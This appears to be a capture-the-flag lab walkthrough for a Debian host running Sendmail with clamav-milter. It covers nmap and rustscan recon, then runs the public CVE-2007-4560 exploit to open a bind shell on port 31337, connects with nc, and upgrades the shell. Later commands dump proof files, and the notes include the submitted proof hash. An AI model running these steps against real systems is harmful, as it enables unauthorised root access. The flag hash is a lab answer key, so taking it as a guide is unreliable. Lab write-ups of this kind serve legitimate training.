Target:
192.168.181.42
Prep
Open Resources
General Mind Map:
https://xmind.app/m/QsNUEz/
Confirm docker is installed and set rustscan as an alias (or add it to bashrc / fish config); it scans all 65535 ports in seconds, which is why it goes first
alias rustscan='sudo docker run -it --rm --name rustscan rustscan/rustscan:2.1.1 -a'
Create directory for target and enter it
mkdir ClamAV
cd ClamAV
Prep a nc listener
nc -nlvp 4444
Confirm ip address
hostname -I
Recon
Start with a quick open port scan
rustscan 192.168.181.42
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
199/tcp open smux syn-ack
445/tcp open microsoft-ds syn-ack
60000/tcp open unknown syn-ack
Quick OS check
sudo nmap -O --top-ports 1000 -v -T4 192.168.181.42 -oN osType.nmap
No exact OS matches for host
Follow up with a service scan on those open ports
sudo nmap -sC -sV -p22,25,80,139,199,445,60000 -v -T5 192.168.181.42 -oN services.nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 303ea4135f9a32c08e46eb26b35eee6d (DSA)
|_ 1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.241], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 303ea4135f9a32c08e46eb26b35eee6d (DSA)
|_ 1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 7h29m59s, deviation: 3h32m08s, median: 4h59m58s
| nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
| 0XBABE<00> Flags: <unique><active>
| 0XBABE<03> Flags: <unique><active>
| 0XBABE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: share (dangerous)
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.14a-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2023-11-10T05:43:59-05:00
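The `-p22,25,...` list above and the searchsploit queries further down were typed by hand from the scan tables. The helper below is added here and is not part of the original notes: two shell functions that pull the open ports and the product/version strings out of an nmap-style table. The sample table is the service-scan output copied from above plus one constructed `filtered` row (53/tcp) to show that non-open rows are skipped; the `<target>` placeholder is not a real host.

```shell
#!/usr/bin/env bash
# Added helper for the recon step above (not part of the original notes):
# build the `nmap -p` list from a port table and pull product/version
# strings out of `nmap -sV` output for searchsploit. Runs offline on the
# sample table below; on a real engagement pass the saved scan files instead.

# Sample input: the service-scan table from this write-up, plus one
# constructed "filtered" row (53/tcp) to show that non-open rows are skipped.
SCAN=$(cat <<'EOF'
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
|_ 1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
53/tcp filtered domain
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
EOF
)

# Open ports as "22,25,80,...": numerically sorted, de-duplicated, and
# limited to rows whose STATE is exactly "open" ("filtered" and
# "open|filtered" rows only slow the follow-up -sC -sV scan down).
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { split($1, p, "/"); print p[1] }' "$@" \
        | sort -n -u | paste -sd, -
}

# One "port product version" line per open service, e.g. "25 Sendmail 8.13.4".
# Columns 1-3 are PORT STATE SERVICE; the product is every VERSION token up
# to the first one starting with a digit, the version is that token with any
# "/8.13.4/Debian-3sarge3" style suffix dropped. Services with no version
# (smux) print the product only.
service_versions() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" && NF >= 4 {
            split($1, p, "/"); prod = ""; ver = ""
            for (i = 4; i <= NF; i++) {
                if ($i ~ /^[0-9]/) { ver = $i; sub(/\/.*/, "", ver); break }
                prod = prod (prod == "" ? "" : " ") $i
            }
            print p[1], prod (ver == "" ? "" : " " ver)
         }' "$@"
}

# Stand-alone run: print the -p argument and one searchsploit term per service.
printf 'nmap -sC -sV -p%s <target>\n' "$(printf '%s\n' "$SCAN" | open_ports)"
printf '%s\n' "$SCAN" | service_versions | while read -r port prod; do
    printf 'searchsploit "%s"   # port %s\n' "$prod" "$port"
done
```

With real output, `open_ports rustscan.txt` feeds the service scan and `service_versions services.nmap` gives one searchsploit query per service, so a second listener such as OpenSSH on 60000 is not missed and version suffixes like the Debian package revision do not narrow the search to nothing.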
Port 22 - ssh (OpenSSH 3.8.1p1; the identical host keys come back on 60000, so that is the same sshd or an identical config. No credentials yet, so parked.)
Port 25 smtp - Path2Root
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.241], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
searchsploit sendmail
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
RCE exploit with both Sendmail and ClamAV (the box name) in the title, so worth a shot
searchsploit -p 4761
Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/4761
Path: /snap/searchsploit/387/opt/exploitdb/exploits/multiple/remote/4761.pl
Codes: CVE-2007-4560
Verified: True
File Type: <missing file package>
Check exploit
![[Pasted image 20231110012951.png]]
The script targets clamav-milter's black-hole mode (CVE-2007-4560): the milter hands recipient addresses to popen() unsanitised, so shell metacharacters in an RCPT TO address execute on the mail server
This copy uses that to open a shell on TCP/31337
Run exploit and confirm
perl 4761.pl 192.168.181.42
![[Pasted image 20231110013503.png]]
nmap labels 31337/tcp as "Elite"; it is open now, so the injected command ran
Connect to it and check whether it answers commands
nc 192.168.181.42 31337
Check Privileges
![[Pasted image 20231110013701.png]]
Upgrade the shell to something more stable (python3 is unlikely to exist on a Debian sarge host; if it is missing, try the same one-liner with plain `python`)
python3 -c 'import pty; pty.spawn("/bin/bash")'
Actions On Objectives
For non-privileged access proof dump
echo " "; echo "local:"; find / -type f -name "local.txt" 2>/dev/null | xargs cat 2>/dev/null;
Dump all local, user, network, and proof info.
echo " "; echo "uname -a:"; uname -a; \
echo " "; echo "hostname:"; hostname; \
echo " "; echo "id"; id; \
echo " "; echo "ifconfig:"; /sbin/ifconfig -a; \
echo " "; echo "proof:"; cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null; echo " "
![[Pasted image 20231110014243.png]]
Submit hash(s)
780234ccfae35670fe766a167822f528
Port 80 http - Not Vuln (nothing exploitable found; TRACE being enabled is at most a low-severity cross-site tracing finding)
nmap --script "http-*" -p 80 -T5 192.168.181.42
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
Kernel Exploits
searchsploit 1.3.33
Exploit Title | Path
Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation | linux/local/3384.c
Shellcodes: No Results
Local privilege escalation only: it needs an existing foothold on the box first, and it is moot here because the clamav-milter path already lands root.
Target URL:
http://192.168.181.42
![[Pasted image 20231110010906.png]]
Binary to text: `ifyoudontpwnmeuran0`